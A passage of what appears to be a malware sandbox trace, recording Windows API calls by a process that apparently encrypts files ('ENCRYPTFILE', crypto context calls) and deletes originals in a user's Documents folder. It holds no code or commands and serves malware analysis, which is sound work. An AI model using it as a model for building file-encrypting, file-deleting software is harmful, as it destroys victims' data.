lpsz="__CRYPT_CONTEXT") returned 0xf [0079.905] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.905] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0079.905] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796f48, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0079.905] CryptReleaseContext (hProv=0x41a46a0, dwFlags=0x0) returned 1 [0079.905] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.905] FreeLibrary (hLibModule=0x756e0000) returned 1 [0079.905] CloseHandle (hObject=0x258) returned 1 [0079.905] CloseHandle (hObject=0x298) returned 1 [0079.907] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\4lc7ZSflvh25kv.pps", nBufferLength=0x7fff, lpBuffer=0x143ece0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\4lc7ZSflvh25kv.pps", lpFilePart=0x0) returned 0x3e [0079.907] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\4lc7ZSflvh25kv.pps" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\4lc7zsflvh25kv.pps")) returned 0x20 [0079.907] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\4lc7ZSflvh25kv.pps", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20c19b40, ftCreationTime.dwHighDateTime=0x1d5edaa, ftLastAccessTime.dwLowDateTime=0x26ec44f0, ftLastAccessTime.dwHighDateTime=0x1d5ed07, ftLastWriteTime.dwLowDateTime=0x26ec44f0, ftLastWriteTime.dwHighDateTime=0x1d5ed07, nFileSizeHigh=0x0, nFileSizeLow=0x2237, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="4lc7ZSflvh25kv.pps", cAlternateFileName="4LC7ZS~1.PPS")) returned 0x41ac440 [0079.907] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\4lc7ZSflvh25kv.pps" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\4lc7zsflvh25kv.pps")) returned 1 [0079.918] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20c19b40, ftCreationTime.dwHighDateTime=0x1d5edaa, ftLastAccessTime.dwLowDateTime=0x26ec44f0, ftLastAccessTime.dwHighDateTime=0x1d5ed07, ftLastWriteTime.dwLowDateTime=0x26ec44f0, ftLastWriteTime.dwHighDateTime=0x1d5ed07, nFileSizeHigh=0x0, nFileSizeLow=0x2237, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="4lc7ZSflvh25kv.pps", cAlternateFileName="4LC7ZS~1.PPS")) returned 0 [0079.918] FindClose (in: hFindFile=0x41ac440 | out: hFindFile=0x41ac440) returned 1 [0079.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43595f0 | out: hHeap=0x1780000) returned 1 [0079.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0079.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0079.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0079.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a4618 | out: hHeap=0x1780000) returned 1 [0079.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0079.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0079.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0079.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0079.918] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0079.918] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0079.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0079.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0079.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0079.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0079.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0079.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0079.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0079.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0079.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4180d58 | out: hHeap=0x1780000) returned 1 [0079.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0079.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0079.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0079.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0079.919] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0079.919] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0079.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0079.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0079.919] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0079.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0079.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0079.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0079.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25f0 [0079.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0079.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0079.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0079.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0079.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0079.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0079.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0079.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0079.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43595f0 [0079.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0079.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0079.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0079.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0079.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xe0) returned 0x19e5a98 [0079.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43595f0 | out: hHeap=0x1780000) returned 1 [0079.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0079.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0079.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0079.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0079.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7d8 [0079.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0079.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0079.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0079.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0079.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0079.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0079.920] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0079.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0079.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0079.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0079.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0079.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0079.920] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0079.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0079.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0079.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0079.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0079.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0079.921] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\JzioP.odp", lpFindFileData=0x144ebc8 | out: lpFindFileData=0x144ebc8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68f95ae0, ftCreationTime.dwHighDateTime=0x1d5e9f1, ftLastAccessTime.dwLowDateTime=0xb1d65d40, ftLastAccessTime.dwHighDateTime=0x1d5e7cf, ftLastWriteTime.dwLowDateTime=0xb1d65d40, ftLastWriteTime.dwHighDateTime=0x1d5e7cf, nFileSizeHigh=0x0, nFileSizeLow=0x13b7, dwReserved0=0x101b1fc, dwReserved1=0x8, cFileName="JzioP.odp", cAlternateFileName="")) returned 0x41ac780 [0079.921] FindClose (in: hFindFile=0x41ac780 | out: hFindFile=0x41ac780) returned 1 [0079.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0079.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0079.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0079.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0079.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0079.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0079.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0079.921] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0079.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0079.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0079.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0079.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2580 [0079.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0079.921] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0079.922] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0079.922] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0079.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0079.922] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa48 [0079.922] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0079.922] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0079.922] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0079.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0079.922] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0079.922] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0079.922] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0079.922] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0079.922] PeekMessageW (in: lpMsg=0x144ec64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ec64) returned 0 [0079.922] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0079.922] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0079.922] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0079.922] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0079.922] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0079.922] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0079.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0079.922] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0079.922] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0079.922] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0079.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0079.922] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0079.922] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0079.922] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25c0 [0079.923] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0079.923] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0079.923] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0079.923] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0079.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0079.923] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2700 [0079.923] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0079.923] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0079.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0079.923] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2670 [0079.923] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0079.923] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0079.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0079.923] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9e8 [0079.923] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0079.923] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0079.923] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0079.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0079.923] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0079.923] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0079.923] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0079.923] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0079.923] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0079.923] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0079.923] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0079.923] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0079.923] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0079.923] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0079.923] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0079.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0079.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0079.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0079.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0079.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0079.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0079.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0079.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0079.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0079.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0079.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0079.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0079.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0079.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0079.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e70 [0079.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0079.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0079.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0079.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0079.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0079.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0079.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0079.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0079.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0079.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0079.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0079.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0079.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0079.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0079.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0079.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0079.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0079.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0079.925] PeekMessageW (in: lpMsg=0x144e74c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e74c) returned 0 [0079.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0079.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0079.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0079.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0079.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0079.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0079.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0079.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0079.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0079.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0079.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0079.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0079.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0079.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0079.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0079.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0079.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0079.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0079.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0079.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0079.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0079.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0079.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0079.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0079.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0079.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0079.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0079.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0079.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0079.926] RtlAllocateHeap 